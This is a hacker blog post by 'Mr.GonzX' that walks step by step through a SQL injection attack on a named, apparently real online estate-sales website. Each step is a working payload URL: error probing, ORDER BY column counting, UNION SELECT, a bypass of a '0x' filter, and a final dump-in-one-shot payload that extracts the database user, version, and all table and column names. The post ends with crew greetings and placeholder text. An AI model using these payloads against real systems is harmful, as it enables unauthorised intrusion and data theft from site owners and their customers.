SQL Injection How to Bypass 418 unused

Hello to all my friends, again im Mr.GonzX



Today i will make an article about How to Bypass 418 unused


Target : https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS

First I check if this website is vulnerable to SQLi, I put ( ' ) in parameter and i got error and my query like this

https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'


Means the website is vulnerable to SQLi : )

Second is fixing the error

https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'--+-


Error fixed, so we will use string based

This time is we will use ORDER BY to see how many columns

So i got 7 columns and my query like this

https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'ORDER+BY+7--+-

Now we use UNION SELECT to see the vulnerable column and my query like this

https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'AND+0+UNION+SELECT+1,2,3,4,5,6,7--+-


So the vulnerable columns is ( 2,1, and 4 )

Lets try to print nick and my query like this

https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'AND+0+UNION+SELECT+1,concat(0x496e6a6563746564206279204d722e476f6e7a58),3,4,5,6,7--+-



But i got error ( unused )

The problem is the 0x, the 0x is blocked, to bypass this we can use single quote and my query like this

https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'AND+0+UNION+SELECT+1,concat('Injected by Mr.GonzX'),3,4,5,6,7--+-



And yes I bypassed the ( unused ) error :)

Lets DIOS, make sure no 0x in your DIOS and my query like this

https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'AND+0+UNION+SELECT+1,concat('<img src=%22https://i.ibb.co/3Tp4CzG/mrgonzx.png%22 height=%22150%22 width=%22150%22>','<br>','<font color=%22red%22><b>','Injected by Mr.GonzX','</b>','</font>','<br>','<font color=blue>','<b>','USER','</b>','</font>','::','<font color=green>',user(),'</font>','<br>','<font color=blue>','<b>','VERSION','</b>','</font>','::','<font color=green>',version(),'</font>','<br>','<font color=blue>','<b>','DATABASE','</b>','</font>','::','<font color=green>',database(),'</font>','<br>','<br>',(select(@x)from(select(@x:=0x00),(select(0)From(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=coNcat(@x,'<li>',table_name,' :::: ',column_name))))x)),3,4,5,6,7--+-

As you can see in my DIOS no 0x


And I successfully bypass the ( unused )  error

Thank your for reading our blog


Greetings :

N16H7 CR4WL3R
TROY
Cyb3rFr0st
Illumni
Mr.Krungx

Tags:
Haikal_

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi eu sem ultrices, porttitor mi eu, euismod ante. Maecenas vitae velit dignissim velit rutrum gravida sit amet eget risus. Donec sit amet mollis nisi, nec commodo est.